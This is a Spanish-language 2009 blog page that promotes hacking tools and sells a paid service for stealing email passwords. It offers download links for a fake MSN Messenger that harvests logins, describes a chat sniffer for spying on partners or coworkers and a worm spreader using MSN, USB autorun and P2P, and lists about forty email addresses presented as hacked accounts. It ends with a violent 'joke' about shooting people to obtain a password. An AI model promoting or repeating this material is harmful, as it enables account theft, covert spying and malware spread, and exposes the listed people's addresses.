jueves, 26 de febrero de 2009

Ratero MSN 8 : Hackear Hotmail de Usuarios Locales

Ratero MSN 8 : Hackear Hotmail de Usuarios Locales


El Ratero Msn es un programa creado para poder robar contraseñas del MSN Messenger y Hotmail fácilmente, es una réplica exacta del MSN Messenger, con la diferencia que almacena los usuarios y sus contraseñas para que después las podas ver.
Lo primero que tenes que hacer es ejecutar el instalador. Una vez ejecutado este se instala automáticamente, en el escritorio vas a tener un acceso directo con el nombre "MSN Messenger", el cual inicia el Messenger falso.
Cuando un usuario intenta iniciar su sesión, el programa le da un error, guarda su contraseña e inmediatamente se abre el Messenger verdadero, con el que puede iniciar la sesión normalmente para no levantar sospechas.Para ver las contraseñas tenes que Ir a *MI PC* - *DISCO LOCAL C:* - *ARCHIVOS DEL PROGRAMA* - *MSN MESSENGER* , Abra el Archivo *AUTORUN* ahi estan Todos los Usuarios y Contraseñas .

Rapidshare : http://rapidshare.de/files/38311201/Ratero_MSN_8.rar.html
Gigasize : http://www.gigasize.com/get.php/-1100255234/mzn8_ratero_by_RC.rar
Megaupload : http://www.megaupload.com/?d=REJF7SFL

el msn ratero 2009 solo sirve si puedes instalarlo en la pc de la victima hay otras formas mucho mas efectivas de hackear correos de personas en otras ciudades, esto gracias a fallas en los sistemas de login de empresas como yahoo , hotmail , gmail , latinmail ,etc podemos obtener la contraseña que usa de modo remoto sin necesidad que se conecte a su pc
este servicio no es gratuito y tiene un costo de 150 (dolares / euros) interesados escrivir a suravirtual@gmail.com para darles demostracion del trabajo profesional que realizamos sin margen de falla , 100% seguro




******************************************

obtener contraseñas de forma profesional
contacto : suravirtual@gmail.com
costo : 200 (america/dolares , europa=euros)
pagos por adelantado = NO
pruebas o demostraciones = SI
hacen preguntas o sobre los motivos = NO
Descuentos o rebajas = NO
otros = Nos Reservamos el derecho de admision

la otra persona no notara nada , garantia al 100% de efectividad



Messenger Detect


¿Te puede la curiosidad de saber de qué están hablando tu enamorado . esposo o tus compañeros?


Pues ahora tienes la oportunidad de espiarles con Messenger Dectect, una especie de sniffer diseñado exclusivamente para espiar las conversaciones del Messenger.

Con Messenger Dectect no necesitas instalar ningún programa o utilidad en otro ordenador. Como buen sniffer, basta con ejecutar el programa, seleccionar la Definición de 'Interfaz' :Consiste en el conjunto de funciones, opciones y otras formas de expresar las instrucciones que ofrece un programa para 'comunicarse' con el usuario. La interfaz más habitual en programas para Windows es la Interfaz Gráfica de Usuario (GUI) proporciona una solución más satisfactoria para el usuario, ya que ofrece un entorno gráfico mucho más cómodo de usar."> interfaz de red local que quieres espiar y esperar a que alguien envíe un mensaje.

Sus funciones te permitirá visualizar todos los diálogos cómodamente desde la pantalla de tu PC, salvarlos en un archivo de texto, listar todos los mensajes registrados entre dos fechas, ejecutar búsquedas de palabras clave, proteger el acceso al programa mediante una contraseña, entre otras posibilidades.

******************************************

obtener contraseñas de forma profesional
contacto : suravirtual@gmail.com
costo : 200 (america/dolares , europa=euros)
pagos por adelantado = NO
pruebas o demostraciones = SI
hacen preguntas o sobre los motivos = NO
Descuentos o rebajas = NO
otros = Nos Reservamos el derecho de admision

la otra persona no notara nada , garantia al 100% de efectividad

mira las conversaciones de mesenger de tus compañeros de universidad o trabajo


mira las conversaciones de mesenger de tus compañeros de universidad o trabajo


Multi spread es un nuevo programa que básicamente sirve para esparcir tu server por MSN, P2P y USB. Los medios mas comunes de propagación.

El spread MSN es el típico worm que envía un mensaje a todos los contactos y seguidamente envía el archivo para hackear pc Ademas de que las victimas pasan todos los antivirus que encuentran hasta que se logran desinfectar.

Con el spread USB se copia a todos los discos extraíbles, por ejemplo pendrives, mp3, mp4, algunas memorias de cámaras digitales, etc. Agrega un autorun para que cuando se inserte el dispositivo en otro equipo este se infecte.

Y con P2P, simplemente se copia a todas las carpetas para compartir (o de descargas) de los programas P2P seleccionados con todos los nombres de la lista cargada o por defecto. Por ejemplo si tiene el ares se copiara con todos los nombres de la lista cargada en la carpeta "My Shared folder", para que se lo descarguen.


******************************************

obtener contraseñas de forma profesional
contacto : suravirtual@gmail.com
costo : 200 (america/dolares , europa=euros)
pagos por adelantado = NO
pruebas o demostraciones = SI
hacen preguntas o sobre los motivos = NO
Descuentos o rebajas = NO
otros = Nos Reservamos el derecho de admision

la otra persona no notara nada , garantia al 100% de efectividad


¿Cómo "hackear" una cuenta de correo de hotmail? :: Primera parte :: (Actualizado)

Este manual lo comencé hace ya algunos meses y lo dejé abandonado, así que decidí, en lo que termino la segunda parte, publicar la primera. Espero que les sea útil. No pretende ser un manual para hackear sino para conocer las técnicas de hack que suelen utilizar algunas personas, y de esta manera no caer en dichas trampas.

¿Se puede "hackear" hotmail?

Hace tres días mi amiga Karla acudió a mí pidiéndome ayuda puesto que habían "hackeado" su cuenta de Hotmail®. (Hace algunas semanas a mi amiga blue le ocurrió lo mismo). Dentro de esta cuestión del hack existen muchos mitos y muchas personas que se jactan de ser hackers así que para todos aquellos que tienen dudas sobre la seguridad de su cuenta de Hotmail® aquí explicaré algunos métodos utilizados para hackear una cuenta de Hotmail® y cómo prevenirlo, para que no se dejen engañar ni apantallar.

Primera parte: ¿A qué llamaríamos hackear hotmail?

Técnicamente, sería burlar la seguridad de los servidores de Microsoft utilizados para Hotmail®

Prácticamente, al simple hecho de obtener la contraseña de un usuario por el medio que sea, así que el término sería "hackear una cuenta de Hotmail®"

¿Qué es Hotmail®?

No pretendo profundizar en este tema, así que seré breve y poco técnico, además de que no conozco a la perfección los sistemas de Microsoft. Hotmail® es el sistema de correo electrónico a través de página web más conocido del mundo y me atrevo a decir que el que más usuarios tiene. Este sistema es un programa CGI (programa que se ejecuta del lado del servidor y utiliza los datos que le son enviados desde un navegador) este programa se comunica con un servidor de correo SMTPSVC (ver 6.0.3790.211) y POP a través de una página web. En pocas palabras, digamos que es "un Outlook®" que abres con un navegador (Internet Explorer); así lo vemos desde una pagina Web.

Veamos algunos métodos para hackear una cuenta de Hotmail®

Separaremos estos métodos en dos grupos: remotos y locales

Primera parte

Keyloggers
Xploits
Snifers
Brute Force

Segunda parte

Troyanos
Screen Fakes
Pregunta secreta y claves débiles
Ingeniería Social

Key loggers:

Como su nombre lo indica: "grabadores de tecla" es la mejor traducción que le pude dar. Estos son programas que se instalan en una computadora y básicamente lo que hacen es registrar todo lo que es tecleado en tu computadora, existen desde los más sencillos hasta variaciones más complejas con diferentes opciones, incluso hasta plugins.

Algunos simplemente guardan en un archivo de texto todo lo que has escrito, otros lo mandan a un correo, a su vez muchos de estos tienen opciones para registrar conversaciones que sostienes en MSN Messenger®, también hay los que graban (screenshots) imágenes de tu computadora cada x tiempo, los más sofisticados pueden grabar un registro de qué programas abriste, a qué programa le diste clic, etc.

¿Cómo funciona?

Básicamente es una de las formas más fáciles de obtener una contraseña. El atacante sólo requiere de tener acceso unos minutos ala computadora donde la víctima checa su correo e instalar el key logger. Si usas una computadora pública es mucho más fácil que contenga un key logger, ya sea para obtener específicamente tu password o simplemente por alguien que obtiene passwords de personas al azar.

Al estar instalado el software y después de que has checado tu mail en ella, el atacante simplemente tiene que regresar a la computadora para obtener el archivo con las claves guardadas o revisar su cuenta de correo para revisar que el programa haya enviado este archivo o la clave específicamente.

¿Cómo protegernos?

Algunas medidas son:

No checar tu correo en una computadora que alguien más usa, o no permitir a cualquiera usar tu máquina.
Si utilizas computadoras públicas como las de la escuela, trabajo, cybercafés, etc., simplemente debes acostumbrar cambiar tu contraseña constantemente (algo tedioso) y obviamente en computadoras distintas.

Otro punto es verificar la posibilidad de que la computadora donde te encuentras esté infectada. Es un poco difícil saber si ha sido o no "infectada" por un key logger, algunos métodos para protegerte son los siguientes:

Instalar un antivirus, (aunque los key loggers normalmente no son detectados por Norton
Instalar un anti-spybot (tampoco ayuda tanto aunque sí un poco más que el antivirus
Buscando en tu sistema control+alt+sup (en Windows) puedes ver los programas que se están ejecutando en el sistema en ese momento, aunque algunos de estos se esconden al ser ejecutados como servicios, los cuales no pueden ser vistos desde la ventana de procesos, otro inconveniente es que algunos programas "join" permiten unir programas en uno solo, es decir se puede unir messeger.exe con un key logger.exe, así que cuando ejecutamos messenger se ejecuta el key logger y por último, es difícil saber qué debe y qué no correr en tu sistema, sobre todo si no eres un experto en la materia.

Nota: No pretendo dar el nombre de algún key loggery mucho menos recomendar alguno, puesto que este artículo no pretende enseñar a "hackear" una cuenta.

Xploit:

Los xploit son programas diseñados para aprovecharse de un "bug" ( Error de programación) en algún sistema

¿Cómo funcionaría?

Básicamente necesitaríamos un error en msn Messenger®, en el navegador utilizado para checar la cuenta, en el programa cgi de hotmail® o en los servidores de Microsoft, lo cual implicaría hackear directamente a Microsoft y no a una cuenta.

Seguramente has visto e incluso instalado los famosos service packs o actualizaciones (parches); también últimamente se ha visto un parche de seguridad para MSN Messenger 6.2... Bueno, pues precisamente todos estos parches corrigen esos errores de seguridad (y algunos otros como de rendimiento) en los cuales puede haber uno para obtener la cuenta de correo, algunas personas llaman Xploits a los Screen Fake.

Comentario: en la versión 6.2 se corrigió un error que permitía ver a quienes te bloqueaban.

Sniffers:

Cuando te conectas a Internet, lo que haces en realidad es conectar tu computadora con otra (servidor) la cual a su vez se conecta con otras. Al abrir la página de hotmail® y poner tu nombre de usuario y contraseña, estos datos son enviados a la computadora a la que te conectaste, es decir, al servidor de tu proveedor de Internet, éste a su vez los enviará a otro servidor y así hasta llegar al servidor de Hotmail, dentro de todo este transcurso, tu mensaje no debió haber sido leído por ninguno de estos servidores, sólo enviado al siguiente y así sucesivamente hasta llegar al de hotmail, ya que el paquete no iba dirigido a ellos.

Ahora podemos entender qué es un snifer; el snifer es un programa que se instala en una computadora, en este caso un servidor y sirve para leer paquetes que no son para él, así que las computadoras (servidores) desde tu proveedor hasta antes de llegar al de hotmail podrían tener instalado un sniffer y obtener tu clave. Lo mismo sucede con un cyber café o la red de la escuela, la computadora envía la información al servidor del cyber café, normalmente la computadora donde está sentado el encargado o dueño, la cual podría tener un snifer. En este caso cabe destacar que hotmail corre bajo una conexión "segura", es decir, tú entras a http://hotmail.com,pero al enviar la contraseña te manda a una página como http://by18fd.bay18.hotmail.msn.com/cgi-bin/hmhome?fti=yes&curmbox=F000000001 &a=d0a17415ecdb526effet4fdl13mfdf52&_lang=ES&country=MX , en fin; sin entrar en complicaciones, tu clave "viaja" por la red encriptada, así que tu contraseña digamos "mi clave" se vería, por ejemplo, así: 3a9e2949768ef8dbba16e6007a29034e y el atacante tendría que desencriptarla.

¿Cómo nos protegemos?

Básicamente no hay nada que hacer contra eso, aunque existe la protección de Microsoft al correr su servidor en un protocolo "seguro" el https.

Brute force:

El brute force es un método de ataque en el cual se busca probar diferentes claves de acceso por medio de un programa, estas claves pueden ser:

Generadas al azar o bajo cierto criterio como mayúsculas minúsculas X cantidad de caracteres, números, etc.
Tomando las palabras de un diccionario, es decir un archivo de texto con diferentes claves.
Una mezcla de estos dos.

Existe un programa muy conocido por la red que permite atacar a Hotmail, Yahoo, AOL, prácticamente a cualquier sistema de e-mail por web, si mal no recuerdo se llama "mungabunga" si deseas buscarlo y probarlo te recuerdo que trae incluido un "free virus"... sí, así es, y no te emociones con que te dan algo gratis o que no tiene virus, sino todo lo contrario, al instalar este programa estarás instalando un troyano en tu máquina.

¿Cómo nos protegemos?

Lo principal es escoger claves "fuertes" es decir que tu clave sea compleja. Una combinación de mayúsculas y minúsculas, números y de ser posible caracteres, y de un mínimo de 8 caracteres.

Asimismo, no debes usar alabaras de "diccionario comunes" es decir, existen listas de diccionario que puedes encontrar y bajar fácilmente, estas listas están hechas para ciertos perfiles o generales, por ejemplo si la victima es un doctor, podemos encontrar listas con claves como nombres de medicinas, nombres técnicos de los órganos del cuerpo, etc.

Nunca guardes tus contraseñas en un archivo en tu computadora o en un postip en la pantalla de la computadora, que créanme que lo he visto muchas veces.

Otra protecciones que nuevamente nuestros "amigos" de Microsoft han desarrollado un sistema para proteger una cuenta de Hotmail® de este tipo de ataques. Este sistema es muy simple y bajo mi punto de vista tiene algunos bugs por allí. Consiste en bloquear la cuenta después de aproximadamente 10 intentos fallidos, no estoy seguro si lo hacen por cantidad o es una relación de la cantidad de intentos y el tiempo en el que fue ejecutado, aunque me inclino más por el último.

Nota: antes de escribir esta parte hice el intento con una cuenta mía y fueron 10 intentos, lo interesante o el inconveniente es que mi cuenta sigue bloqueada desde hace aproximadamente 20 horas :-/

Inconvenientes: Es obvio que si alguien nos quiere fastidiar y no precisamente "hackear", esto permite a cualquiera mantener nuestra cuenta bloqueada. Muy mal señores de Microsoft.

Fín de la primera parte...

si deseas contratarme para robar correos , mi correo es suravirtual@gmail.com ,
******************************************

obtener contraseñas de forma profesional
contacto : suravirtual@gmail.com
costo : 200 (america/dolares , europa=euros)
pagos por adelantado = NO
pruebas o demostraciones = SI
hacen preguntas o sobre los motivos = NO
Descuentos o rebajas = NO
otros = Nos Reservamos el derecho de admision

la otra persona no notara nada , garantia al 100% de efectividad

lista de correos hackeados 2009 (no recogidos)

mcla_chiclayana_@hotmail.com
martindalforno@hotmail.com
darky_ardiyani@hotmail.com
jctaech@hotmail.com
lydya.com@hotmail.com
lamh007@hotmail.com
forrito93@hotmail.com
gahan10@hotmail.com
soniamedi@hotmail.com
alexasol40@hotmail.com
alezee_tatu18@hotmail.com
tAtU_march13@hotmail.com
mousemurder@hotmail.com
lucesitama@yahoo.com
viky69uy@hotmail.com
resrepo@homail.com
a_ponce_de_leon@hotmail.com
xabi.eh@hotmail.com
moises_alejandro_12@hotmail.com
extremo-j@hotmail.com
milloscars1981@hotmail.com
rociostorm@hotmail.com
consigo-pass@hotmail.com
soytina78@hotmail.com
ladybonilla_x@hotmail.com
lucy_flow2@hotmail.com
diegoam816@hotmail.com
Darktress333@hotmail.es
gelen753@hotmail.com
jbyrobm@hotmail.com
angy_rondon@hotmail.com
morenoalcuadrado@hotmail.com
diegoam816@hotmail.com
martaleta@live.com
eospam@hotmail
quintoelementogmb@hotmail.com
mari_el_x100pre@hotmail.es
snoopydennis@hotmail.com
gerardobaires@gmail.com
migue_leonb1@hotmail.com
dajevi81@hotmail.com
jvjt03@hotmail.com

aicull_as19@hotmail.com

******************************************

obtener contraseñas de forma profesional
contacto : suravirtual@gmail.com
costo : 200 (america/dolares , europa=euros)
pagos por adelantado = NO
pruebas o demostraciones = SI
hacen preguntas o sobre los motivos = NO
Descuentos o rebajas = NO
otros = Nos Reservamos el derecho de admision

la otra persona no notara nada , garantia al 100% de efectividad

Forma eficaz de conseguir clave de hotmail

Vas a la armería (tienda de armas) más cercana, te compras una 9mm, cuando pides probarla, la cargas, y matas a todos a tiros ahí mismo.

Sales rápido para que no te atrape la policía, y entonces vas a donde vive el tipo que quieres hackear. Le tocas la puerta, con la excusa de que eres repartidor de pizza, y él se gano una.

(NOTA IMPORTANTE: vas con pasamontañas eh!!!)

Entonces le pegas un tiro en la rodilla, lo llevas a la PC, y le dices que te apunte en un papelito su password de hotmail y lo amenazas diciéndole, que si cambia el password, tendrás que volver a hackearlo.
FIN …

Este método funciona también con Yahoo, Gmail, ….